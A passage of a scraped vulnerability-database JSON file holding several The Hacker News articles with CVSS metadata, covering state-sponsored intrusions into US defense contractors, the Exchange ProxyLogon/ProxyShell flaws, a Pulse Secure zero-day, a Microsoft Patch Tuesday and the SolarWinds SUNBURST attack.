{"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2019-1653", "CVE-2019-19781", "CVE-2019-2725", "CVE-2019-7609", "CVE-2019-9670", "CVE-2020-14882", "CVE-2020-4006", "CVE-2020-5902", "CVE-2021-21972", "CVE-2021-26855"], "modified": "2021-05-11T06:23:38", "id": "THN:1ED1BB1B7B192353E154FB0B02F314F4", "href": "https://thehackernews.com/2021/05/top-11-security-flaws-russian-spy.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:37:33", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEgfHxH3Dt4VXRfmdH7Z5AIzdTH11h4caDd4ap4XoxMEluunQIHIKcMfsOmGXHYfBm80iV7yauBv6comuqDI53yYZ-scRdempbDZFRKoVre0dwv8XB-HY7OuqI3zugrjX_AU4O94F-ikvT5ttBGEc9cGB3wRTB1Tkpo2jFZZ5dobK0ftUAK2GlxVr_sa>)\n\nState-sponsored actors backed by the Russian government regularly targeted the networks of several U.S. cleared defense contractors (CDCs) to acquire proprietary documents and other confidential information pertaining to the country's defense and intelligence programs and capabilities.\n\nThe sustained espionage campaign is said to have commenced at least two years ago from January 2020, according to a [joint advisory](<https://www.cisa.gov/news/2022/02/16/new-cybersecurity-advisory-protecting-cleared-defense-contractor-networks-against>) published by the U.S. Federal Bureau of Investigation (FBI), National Security Agency (NSA), and Cybersecurity and Infrastructure Security Agency (CISA).\n\n\"These continued intrusions have enabled the actors to acquire sensitive, unclassified information, as well as CDC-proprietary and export-controlled technology,\" the agencies [said](<https://www.cisa.gov/uscert/ncas/alerts/aa22-047a>). \"The acquired information provides significant insight into U.S. weapons platforms development and deployment timelines, vehicle specifications, and plans for communications infrastructure and information technology.\"\n\nCompromised entities include contractors that dabble in command, control, communications, and combat systems; surveillance and reconnaissance; weapons and missile development; vehicle and aircraft design; and software development, data analytics, and logistics.\n\nThe threat actors rely on \"common but effective\" tactics to breach target networks such as spear-phishing, credential harvesting, brute-force attacks, password spray techniques, and exploitation of known vulnerabilities in VPN devices, before moving laterally to establish persistence and exfiltrate data.\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEj72CV_TZddW8ZEFbbWJoksQeXFXLFFSgoy22sgxewm7OT-W5YDgBIqLdOhdUK4p3Z5AV32z7EtFYvCInbCCdVzX37Wzqx1TL_G6NeQuEKUOLVC6371dcORdcP2owx3pnjKJyUaGJCQ56o-mLZcUzXswT3hUvEKbXxZBzEmEt8nYAClgNN9xU4V4anK>)\n\nSome of the [vulnerabilities](<https://thehackernews.com/2021/11/us-uk-and-australia-warn-of-iranian.html>) leveraged by the attackers for initial access and privilege escalation are as follows \u2013\n\n * [**CVE-2018-13379**](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) (CVSS score: 9.8) \u2013 FortiOS system file leak through SSL VPN via specially crafted HTTP resource requests\n * [**CVE-2020-0688**](<https://nvd.nist.gov/vuln/detail/CVE-2020-0688>) (CVSS score: 8.8) \u2013 Microsoft Exchange validation key remote code execution vulnerability\n * [**CVE-2020-17144**](<https://nvd.nist.gov/vuln/detail/CVE-2020-17144>) (CVSS score: 8.4) \u2013 Microsoft Exchange remote code execution vulnerability\n\nMany of the intrusions also involve gaining a foothold to enterprise and cloud networks, with the adversaries maintaining persistent access to the compromised Microsoft 365 environments for as long as six months to repeatedly harvest emails and data.\n\n\"As CDCs find and patch known vulnerabilities on their networks, the actors alter their tradecraft to seek new means of access,\" the agencies explained. \"This activity necessitates CDCs maintain constant vigilance for software vulnerabilities and out-of-date security configurations, especially in internet-facing systems.\"\n\nAmong other malicious activities observed is the routine use of virtual private servers (VPSs) as an encrypted proxy and the use of legitimate credentials to exfiltrate emails from the victim's enterprise email system. The advisory, however, does not single out any Russian state actor by name.\n\n\"Over the last several years, Russian state-sponsored cyber actors have been persistent in targeting U.S. cleared defense contractors to get at sensitive information,\" [said](<https://www.nsa.gov/Press-Room/News-Highlights/Article/Article/2935170/nsa-fbi-cisa-release-advisory-on-protecting-cleared-defense-contractor-networks/>) Rob Joyce, director of NSA Cybersecurity. \"Armed with insights like these, we can better detect and defend important assets together.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-17T05:42:00", "type": "thn", "title": "U.S. Says Russian Hackers Stealing Sensitive Data from Defense Contractors", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2020-0688", "CVE-2020-17144"], "modified": "2022-02-17T13:01:50", "id": "THN:80D2DBC4130D9FF314BDC4C19EB5CD4E", "href": "https://thehackernews.com/2022/02/us-says-russian-hackers-stealing.html", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:14", "description": "[](<https://thehackernews.com/images/-4bW5O7qDy3g/YRY939zQM4I/AAAAAAAADho/RUV3iIGj654Ml8xKhGo8MXIEWtGwsL1ywCLcBGAsYHQ/s0/ms-exchnage.jpg>)\n\nThreat actors are actively carrying out opportunistic [scanning](<https://twitter.com/bad_packets/status/1425598895569006594>) and [exploitation](<https://twitter.com/GossiTheDog/status/1425844380376735746>) of Exchange servers using a new exploit chain leveraging a trio of flaws affecting on-premises installations, making them the latest set of bugs after ProxyLogon vulnerabilities were exploited en masse at the start of the year.\n\nThe remote code execution flaws have been collectively dubbed \"ProxyShell.\" At least 30,000 machines are affected by the vulnerabilities, [according](<https://isc.sans.edu/diary/27732>) to a Shodan scan performed by Jan Kopriva of SANS Internet Storm Center.\n\n\"Started to see in the wild exploit attempts against our honeypot infrastructure for the Exchange ProxyShell vulnerabilities,\" NCC Group's Richard Warren [tweeted](<https://twitter.com/buffaloverflow/status/1425831100157349890>), noting that one of the intrusions resulted in the deployment of a \"C# aspx webshell in the /aspnet_client/ directory.\"\n\nPatched in early March 2021, [ProxyLogon](<https://devco.re/blog/2021/08/06/a-new-attack-surface-on-MS-exchange-part-1-ProxyLogon/>) is the moniker for CVE-2021-26855, a server-side request forgery vulnerability in Exchange Server that permits an attacker to take control of a vulnerable server as an administrator, and which can be chained with another post-authentication arbitrary-file-write vulnerability, CVE-2021-27065, to achieve code execution.\n\nThe vulnerabilities came to light after Microsoft [spilled the beans](<https://thehackernews.com/2021/03/urgent-4-actively-exploited-0-day-flaws.html>) on a Beijing-sponsored hacking operation that leveraged the weaknesses to strike entities in the U.S. for purposes of exfiltrating information in what the company described as limited and targeted attacks.\n\nSince then, the Windows maker has fixed six more flaws in its mail server component, two of which are called [ProxyOracle](<https://devco.re/blog/2021/08/06/a-new-attack-surface-on-MS-exchange-part-2-ProxyOracle/>), which enables an adversary to recover the user's password in plaintext format.\n\nThree other issues \u2014 known as ProxyShell \u2014 could be abused to bypass ACL controls, elevate privileges on Exchange PowerShell backend, effectively authenticating the attacker and allowing for remote code execution. Microsoft noted that both CVE-2021-34473 and CVE-2021-34523 were inadvertently omitted from publication until July.\n\n**ProxyLogon:**\n\n * [**CVE-2021-26855**](<https://thehackernews.com/2021/03/microsoft-issues-security-patches-for.html>) \\- Microsoft Exchange Server Remote Code Execution Vulnerability (Patched on March 2)\n * [**CVE-2021-26857**](<https://thehackernews.com/2021/03/microsoft-issues-security-patches-for.html>) \\- Microsoft Exchange Server Remote Code Execution Vulnerability (Patched on March 2)\n * [**CVE-2021-26858**](<https://thehackernews.com/2021/03/microsoft-issues-security-patches-for.html>) \\- Microsoft Exchange Server Remote Code Execution Vulnerability (Patched on March 2)\n * [**CVE-2021-27065**](<https://thehackernews.com/2021/03/microsoft-issues-security-patches-for.html>) \\- Microsoft Exchange Server Remote Code Execution Vulnerability (Patched on March 2)\n\n**ProxyOracle:**\n\n * [**CVE-2021-31195**](<https://thehackernews.com/2021/05/latest-microsoft-windows-updates-patch.html>) \\- Microsoft Exchange Server Remote Code Execution Vulnerability (Patched on May 11)\n * [**CVE-2021-31196**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31196>) \\- Microsoft Exchange Server Remote Code Execution Vulnerability (Patched on July 13)\n\n**ProxyShell:**\n\n * [**CVE-2021-31207**](<https://thehackernews.com/2021/05/latest-microsoft-windows-updates-patch.html>) \\- Microsoft Exchange Server Security Feature Bypass Vulnerability (Patched on May 11)\n * [**CVE-2021-34473**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473>) \\- Microsoft Exchange Server Remote Code Execution Vulnerability (Patched on April 13, advisory released on July 13)\n * [**CVE-2021-34523**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34523>) \\- Microsoft Exchange Server Elevation of Privilege Vulnerability (Patched on April 13, advisory released on July 13)\n\n**Other:**\n\n * [**CVE-2021-33768**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-33768>) \\- Microsoft Exchange Server Elevation of Privilege Vulnerability (Patched on July 13)\n\nOriginally demonstrated at the [Pwn2Own hacking competition](<https://thehackernews.com/2021/04/windows-ubuntu-zoom-safari-ms-exchange.html>) this April, technical details of the ProxyShell attack chain were disclosed by DEVCORE researcher Orange Tsai at the [Black Hat USA 2021](<https://www.blackhat.com/us-21/briefings/schedule/index.html#proxylogon-is-just-the-tip-of-the-iceberg-a-new-attack-surface-on-microsoft-exchange-server-23442>) and [DEF CON](<https://www.youtube.com/watch?v=5mqid-7zp8k>) security conferences last week. To prevent exploitation attempts, organizations are highly recommended to install updates released by Microsoft.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-13T09:46:00", "type": "thn", "title": "Hackers Actively Searching for Unpatched Microsoft Exchange Servers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-31195", "CVE-2021-31196", "CVE-2021-31207", "CVE-2021-33768", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-08-13T09:46:09", "id": "THN:FA40708E1565483D14F9A31FC019FCE1", "href": "https://thehackernews.com/2021/08/hackers-actively-searching-for.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:19", "description": "[](<https://thehackernews.com/images/-HxsxXCBkPXE/YH-natH6OTI/AAAAAAAACUA/6_XHWg-Cu_YYS4p-8w6I8XWh3VRUU9ZMQCLcBGAsYHQ/s0/pulse-secure-hacking.jpg>)\n\nIf Pulse Connect Secure gateway is part of your organization network, you need to be aware of a newly discovered critical zero-day authentication bypass vulnerability (CVE-2021-22893) that is currently being exploited in the wild and for which there is no patch available yet.\n\nAt least two threat actors have been behind a series of intrusions targeting defense, government, and financial organizations in the U.S. and elsewhere by leveraging critical vulnerabilities in Pulse Secure VPN devices to circumvent multi-factor authentication protections and breach enterprise networks.\n\n\"A combination of prior vulnerabilities and a previously unknown vulnerability discovered in April 2021, [CVE-2021-22893](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784/>), are responsible for the initial infection vector,\" cybersecurity firm FireEye [said](<https://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html>) on Tuesday, identifying 12 malware families associated with the exploitation of Pulse Secure VPN appliances.\n\nThe company is also tracking the activity under two threat clusters UNC2630 and UNC2717 (\"[UNC](<https://www.fireeye.com/blog/products-and-services/2020/12/how-mandiant-tracks-uncategorized-threat-actors.html>)\" for Uncategorized) \u2014 the former linked to a break-in of U.S. Defense Industrial base (DIB) networks, while the latter was found targeting a European organization in March 2021 \u2014 with the investigation attributing UNC2630 to operatives working on behalf of the Chinese government, in addition to suggesting possible ties to another espionage actor [APT5](<https://malpedia.caad.fkie.fraunhofer.de/actor/apt5>) based on \"strong similarities to historic intrusions dating back to 2014 and 2015.\"\n\n[](<https://thehackernews.com/images/-_r1BkPmCUK8/YH-n1A6EuZI/AAAAAAAACUI/MS0JCaPy_hEkXJpAquULKRANPrKeNuL_gCLcBGAsYHQ/s728/vpn-hacking.jpg>)\n\nAttacks staged by UNC2630 are believed to have commenced as early as August 2020, before they expanded in October 2020, when UNC2717 began repurposing the same flaws to install custom malware on the networks of government agencies in Europe and the U.S. The incidents continued until March 2021, according to FireEye.\n\nThe list of malware families is as follows -\n\n * **UNC2630** \\- SLOWPULSE, RADIALPULSE, THINBLOOD, ATRIUM, PACEMAKER, SLIGHTPULSE, and PULSECHECK\n * **UNC2717** \\- HARDPULSE, QUIETPULSE, AND PULSEJUMP\n\nTwo additional malware strains, STEADYPULSE and LOCKPICK, deployed during the intrusions have not been linked to a specific group, citing lack of evidence.\n\nBy exploiting multiple Pulse Secure VPN weaknesses ([CVE-2019-11510](<https://thehackernews.com/2020/04/pulse-secure-vpn-vulnerability.html>), [CVE-2020-8260](<https://nvd.nist.gov/vuln/detail/CVE-2020-8260>), [CVE-2020-8243](<https://nvd.nist.gov/vuln/detail/CVE-2020-8243>), and CVE-2021-22893), UNC2630 is said to have harvested login credentials, using them to move laterally into the affected environments. In order to maintain persistence to the compromised networks, the actor utilized legitimate, but modified, Pulse Secure binaries and scripts to enable arbitrary command execution and inject web shells capable of carrying out file operations and running malicious code.\n\nIvanti, the company behind the Pulse Secure VPN, has released [temporary mitigations](<https://us-cert.cisa.gov/ncas/alerts/aa21-110a>) to address the arbitrary file execution vulnerability ([CVE-2021-22893](<https://kb.cert.org/vuls/id/213092>), CVSS score: 10), while a fix for the issue is expected to be in place by early May. The Utah-based company acknowledged that the new flaw impacted a \"[very limited number of customers](<https://blog.pulsesecure.net/pulse-connect-secure-security-update/>),\" adding it has released a [Pulse Connect Secure Integrity Tool](<https://kb.pulsesecure.net/articles/Pulse_Secure_Article/KB44755>) for customers to check for signs of compromise.\n\nPulse Secure customers are recommended to upgrade to PCS Server version 9.1R.11.4 when it becomes available.\n\nNews of compromises affecting government agencies, critical infrastructure entities, and other private sector organizations comes a week after the U.S. government [released an advisory](<https://thehackernews.com/2021/04/us-sanctions-russia-and-expels-10.html>), warning businesses of active exploitation of five publicly known vulnerabilities by the Russian Foreign Intelligence Service (SVR), including CVE-2019-11510, to gain initial footholds into victim devices and networks.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-04-21T04:20:00", "type": "thn", "title": "WARNING: Hackers Exploit Unpatched Pulse Secure 0-Day to Breach Organizations", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2020-8243", "CVE-2020-8260", "CVE-2021-22893"], "modified": "2021-04-21T17:42:28", "id": "THN:AE2E46F59043F97BE70DB77C163186E6", "href": "https://thehackernews.com/2021/04/warning-hackers-exploit-unpatched-pulse.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:39:02", "description": "[](<https://thehackernews.com/images/-B1GIJUi-Xfc/YEhXRdorEMI/AAAAAAAAB_o/0vVWsLXOqu0OjfRxUmUTUUvsoLhkTBy6QCLcBGAsYHQ/s0/windows-update-download.jpg>)\n\nMicrosoft plugged as many as [89 security flaws](<https://msrc.microsoft.com/update-guide/releaseNote/2021-Mar>) as part of its monthly Patch Tuesday updates released today, including fixes for an actively exploited zero-day in Internet Explorer that could permit an attacker to run arbitrary code on target machines.\n\nOf these flaws, 14 are listed as Critical, and 75 are listed as Important in severity, out of which two of the bugs are described as publicly known, while five others have been reported as under active attack at the time of release.\n\nAmong those five security issues are a clutch of vulnerabilities known as [ProxyLogon](<https://thehackernews.com/2021/03/urgent-4-actively-exploited-0-day-flaws.html>) (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065) that allows adversaries to break into Microsoft Exchange Servers in target environments and subsequently allow the installation of unauthorized web-based backdoors to facilitate long-term access.\n\nBut in the wake of Exchange servers coming under [indiscriminate assault](<https://thehackernews.com/2021/03/microsoft-exchange-cyber-attack-what-do.html>) toward the end of February by multiple threat groups looking to exploit the vulnerabilities and plant backdoors on corporate networks, Microsoft took the unusual step of releasing out-of-band fixes a week earlier than planned.\n\nThe ramping up of [mass exploitation](<https://krebsonsecurity.com/2021/03/warning-the-world-of-a-ticking-time-bomb/>) after Microsoft released its updates on March 2 has led the company to deploy [another series of security updates](<https://techcommunity.microsoft.com/t5/exchange-team-blog/march-2021-exchange-server-security-updates-for-older-cumulative/ba-p/2192020>) targeting [older and unsupported](<https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/>) cumulative updates that are vulnerable to ProxyLogon attacks.\n\nAlso included in the mix is a patch for zero-day in Internet Explorer (CVE-2021-26411) that was discovered as exploited by North Korean hackers to [compromise security researchers](<https://thehackernews.com/2021/01/n-korean-hackers-targeting-security.html>) working on vulnerability research and development earlier this year.\n\nSouth Korean cybersecurity firm ENKI, which publicly [disclosed](<https://thehackernews.com/2021/02/new-chrome-browser-0-day-under-active.html>) the flaw early last month, claimed that North Korean nation-state hackers made an unsuccessful attempt at targeting its security researchers with malicious MHTML files that, when opened, downloaded two payloads from a remote server, one of which contained a zero-day against Internet Explorer.\n\nAside from these actively exploited vulnerabilities, the update also corrects a number of remote code execution (RCE) flaws in Windows DNS Server (CVE-2021-26877 and CVE-2021-26897, CVSS scores 9.8), Hyper-V server (CVE-2021-26867, CVSS score 9.9), SharePoint Server (CVE-2021-27076, CVSS score 8.8), and Azure Sphere (CVE-2021-27080, CVSS score 9.3).\n\nCVE-2021-26877 and CVE-2021-26897 are notable for a couple of reasons. First off, the flaws are rated as \"exploitation more likely\" by Microsoft, and are categorized as zero-click vulnerabilities of low attack complexity that require no user interaction.\n\nAccording to [McAfee](<https://www.mcafee.com/blogs/other-blogs/mcafee-labs/seven-windows-wonders-critical-vulnerabilities-in-dns-dynamic-updates/>), the vulnerabilities stem from an out of bounds read (CVE-2021-26877) and out of bounds write (CVE-2021-26897) on the heap, respectively, during the processing of [Dynamic Update](<https://docs.microsoft.com/en-us/troubleshoot/windows-server/networking/configure-dns-dynamic-updates-windows-server-2003>) packets, resulting in potential arbitrary reads and RCE.\n\nFurthermore, this is also the second time in a row that Microsoft has addressed a critical RCE flaw in Windows DNS Server. Last month, the company rolled out a fix for [CVE-2021-24078](<https://thehackernews.com/2021/02/microsoft-issues-patches-for-in-wild-0.html>) in the same component which, if unpatched, could permit an unauthorized party to execute arbitrary code and potentially redirect legitimate traffic to malicious servers.\n\nTo install the latest security updates, Windows users can head to Start > Settings > Update & Security > Windows Update, or by selecting Check for Windows updates.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-10T05:37:00", "type": "thn", "title": "Microsoft Issues Security Patches for 89 Flaws \u2014 IE 0-Day Under Active Attacks", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24078", "CVE-2021-26411", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-26867", "CVE-2021-26877", "CVE-2021-26897", "CVE-2021-27065", "CVE-2021-27076", "CVE-2021-27080"], "modified": "2021-08-13T09:07:37", "id": "THN:BC8A83422D35DB5610358702FCB4D154", "href": "https://thehackernews.com/2021/03/microsoft-issues-security-patches-for.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:41", "description": "[](<https://thehackernews.com/images/-Cpd5jYOBXGk/X9b7WId_6xI/AAAAAAAABPY/RSyw2zajv6MRRJNaCspQPEerTW8vEpNpACLcBGAsYHQ/s0/solarwinds.jpg>)\n\nState-sponsored actors allegedly working for Russia have [targeted](<https://www.washingtonpost.com/national-security/russian-government-spies-are-behind-a-broad-hacking-campaign-that-has-breached-us-agencies-and-a-top-cyber-firm/2020/12/13/d5a53b88-3d7d-11eb-9453-fc36ba051781_story.html>) the US Treasury, the Commerce Department's National Telecommunications and Information Administration (NTIA), and other government agencies to [monitor internal email traffic](<https://www.reuters.com/article/us-usa-cyber-amazon-com-exclsuive/exclusive-u-s-treasury-breached-by-hackers-backed-by-foreign-government-sources-idUSKBN28N0PG>) as part of a widespread cyberespionage campaign.\n\nThe Washington Post, citing unnamed sources, said the latest attacks were the work of APT29 or Cozy Bear, the same hacking group that's believed to have orchestrated a breach of US-based cybersecurity firm [FireEye](<https://thehackernews.com/2020/12/cybersecurity-firm-fireeye-got-hacked.html>) a few days ago leading to the theft of its Red Team penetration testing tools.\n\nThe motive and the full scope of what intelligence was compromised remains unclear, but signs are that adversaries tampered with a software update released by Texas-based IT infrastructure provider SolarWinds earlier this year to infiltrate the systems of government agencies as well as FireEye and mount a highly-sophisticated [supply chain attack](<https://en.wikipedia.org/wiki/Supply_chain_attack>).\n\n\"The compromise of SolarWinds' Orion Network Management Products poses unacceptable risks to the security of federal networks,\" said Brandon Wales, acting director of the US Cybersecurity and Infrastructure Security Agency (CISA), which has [released](<https://www.cisa.gov/news/2020/12/13/cisa-issues-emergency-directive-mitigate-compromise-solarwinds-orion-network>) an emergency directive, urging federal civilian agencies to review their networks for suspicious activity and disconnect or power down SolarWinds Orion products immediately.\n\nSolarWinds' networking and security products are used by more than [300,000 customers worldwide](<https://www.solarwinds.com/company/customers>), including Fortune 500 companies, government agencies, and education institutions.\n\nIt also serves several major US telecommunications companies, all five branches of the US Military, and other prominent government organizations such as the Pentagon, State Department, NASA, National Security Agency (NSA), Postal Service, NOAA, Department of Justice, and the Office of the President of the United States.\n\n### An Evasive Campaign to Distribute SUNBURST Backdoor\n\nFireEye, which is tracking the ongoing intrusion campaign under the moniker \"[UNC2452](<https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html>),\" said the supply chain attack takes advantage of trojanized SolarWinds Orion business software updates in order to distribute a backdoor called SUNBURST.\n\n\"This campaign may have begun as early as Spring 2020 and is currently ongoing,\" FireEye said in a Sunday analysis. \"Post compromise activity following this supply chain compromise has included lateral movement and data theft. The campaign is the work of a highly skilled actor and the operation was conducted with significant operational security.\"\n\n[](<https://thehackernews.com/images/-PbITJeTtDpo/X9b7oJ1VO6I/AAAAAAAABPg/V3gShVN1NtYYFwAKCmwfQuhQjkNYMDgQgCLcBGAsYHQ/s0/solarwinds-backdoor.jpg>)\n\nThis rogue version of SolarWinds Orion plug-in, besides masquerading its network traffic as the Orion Improvement Program ([OIP](<https://support.solarwinds.com/SuccessCenter/s/article/Orion-Improvement-Program?language=en_US>)) protocol, is said to communicate via HTTP to remote servers so as to retrieve and execute malicious commands (\"Jobs\") that cover the spyware gamut, including those for transferring files, executing files, profiling and rebooting the target system, and disabling system services.\n\nOrion Improvement Program or OIP is chiefly used to collect performance and usage statistics data from SolarWinds users for product improvement purposes.\n\nWhat's more, the IP addresses used for the campaign were obfuscated by VPN servers located in the same country as the victim to evade detection.\n\nMicrosoft also corroborated the findings in a separate analysis, stating the attack (which it calls \"[Solorigate](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Behavior:Win32/Solorigate.C!dha&ThreatID=2147771132>)\") leveraged the trust associated with SolarWinds software to insert malicious code as part of a larger campaign.\n\n\"A malicious software class was included among many other legitimate classes and then signed with a legitimate certificate,\" the Windows maker said. The resulting binary included a backdoor and was then discreetly distributed into targeted organizations.\"\n\n### SolarWinds Releases Security Advisory\n\nIn a [security advisory](<https://www.solarwinds.com/securityadvisory>) published by SolarWinds, the company said the attack targets versions 2019.4 through 2020.2.1 of the SolarWinds Orion Platform software that was released between March and June 2020, while recommending users to upgrade to Orion Platform release 2020.2.1 HF 1 immediately.\n\nThe firm, which is currently investigating the attack in coordination with FireEye and the US Federal Bureau of Investigation, is also expected to release an additional hotfix, 2020.2.1 HF 2, on December 15, which replaces the compromised component and provides several extra security enhancements.\n\nFireEye last week disclosed that it fell victim to a highly sophisticated foreign-government attack that compromised its software tools used to test the defenses of its customers.\n\nTotaling as many as [60 in number](<https://www.picussecurity.com/resource/blog/techniques-tactics-procedures-utilized-by-fireeye-red-team-tools>), the stolen Red Team tools are a mix of publicly available tools (43%), modified versions of publicly available tools (17%), and those that were developed in-house (40%).\n\nFurthermore, the theft also includes exploit payloads that leverage critical vulnerabilities in Pulse Secure SSL VPN (CVE-2019-11510), Microsoft Active Directory (CVE-2020-1472), Zoho ManageEngine Desktop Central (CVE-2020-10189), and Windows Remote Desktop Services (CVE-2019-0708).\n\nThe campaign, ultimately, appears to be a supply chain attack on a global scale, for FireEye said it detected this activity across several entities worldwide, spanning government, consulting, technology, telecom, and extractive firms in North America, Europe, Asia, and the Middle East.\n\nThe indicators of compromise (IoCs) and other relevant attack signatures designed to counter SUNBURST can be accessed [here](<https://github.com/fireeye/sunburst_countermeasures>).\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter 